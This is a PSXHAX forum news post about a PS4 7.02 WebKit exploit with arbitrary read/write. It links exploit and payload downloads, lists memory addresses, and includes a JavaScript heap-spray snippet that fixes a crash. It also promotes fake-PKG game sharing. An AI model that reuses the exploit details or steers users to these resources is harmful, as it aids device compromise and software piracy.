Join Us and become a Member for a Verified Badge on Discord to access private areas with the latest PS4 FPKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date Dec 14, 2020 at 7:48 PM       111,002       123      
Status
Not open for further replies.
Proceeding the This is for the Pwners presentation at Black Hat Europe 2020 and the Talos WebSocket Vulnerability disclosure, PlayStation 4 developer sleirsgoevy shared on Twitter a PS4 WebKit Exploit 7.02 with Arbitrary Read / Write Access that can be used with the previously released PS4 7.02 Kernel Exploit (KEX) at a 10% success rate on 7.02 PS4 OFW prior to his fix for the crash in leakJSC(), alongside 7.02 Mira and Payload Ports via @Al Azif... who reminds everyone NOT to enable IDU Mode (read HERE why) while stating the following on Twitter:

⚠️ "Down time should be minimal but if you are already on an exploitable firmware you should probably hold up a bit to make sure everything is working."

Download: PS4-webkit-exploit-7.02.rar (33.8 KB) / PS4-webkit-exploit-6.XX-master.zip / GIT / PS4-webkit-exploit-7.02-master.zip / GIT (Fork by sleirsgoevy) / Demo / payloads_1.0.5.zip / GIT / 702_MACROSS_COLLECTION_FOR_SLEIRSGOEVY.rar / Mira 7.00-7.02 PS4 Ports / GIT / PS4 7.02 Punch Payload Injector / 7.02 PS4 OFW PUP / test-payloads.7z (34.96 KB) / test-payloads-v2.7z (37.92 KB)

:note: For those in the PlayStation 4 Scene who are curious, HERE and HERE are lists of games through 7.02 that are not currently working with the 6.72 PS4 Jailbreak Exploit.

:idea: If you haven't done so yet, be sure to follow the PSXHAX Member Verification & PS4 Fake PKG (FPKG) Sharing Guide to become a Verified Member by getting a Blue Verified Badge (FAQ in the spoiler HERE) through our PSXHAX Floating Discord Channel to access private or restricted areas for the latest FPKG game releases! 🏴‍☠️

Some valid 7.02 addresses:
  • 0x200eb00d8
  • 0x200f300d8
  • 0x200fb00d8
  • 0x2011100d8
The success rate is about 10% for the last one. Unfortunately the exploit then crashes in the critical section in leakJSC. Will now investigate how to fix it.
Code:
Fix for the crash in leakJSC(): after debug_log("[+] Got a relative read"); insert        var tmp_spray = {};        for(var i = 0; i < 100000; i++)                tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;

:arrow: Update: It appears the 7.02 WebKit exploit is also working on 7.51 through 7.55, but keep in mind the current Kernel exploit only supports up to 7.02 so those above will have to wait for a newer KEX to be released publicly for a full jailbreak.

PS4 7.51 WEBKIT EXPLOIT CONFIRMED via Quenlood

THIS IS NOT A FULL JAILBREAK AND WEBKIT EXPLOIT NOT STABLE BUT ABSOLUTELY WORKING.

FOR 7.02 I THINK GOING TO JAILBREAK SOON BUT FOR 7.51 WE NEED TO WAIT FOR KERNEL EXPLOIT. :(

THANKS SLEIRSGOEVY

PS4 WebKit Exploit 7.02 with Arbitrary Read Write Access and Payloads!.jpg
 

Comments

Status
Not open for further replies.

:fire: Latest Help Topics

Top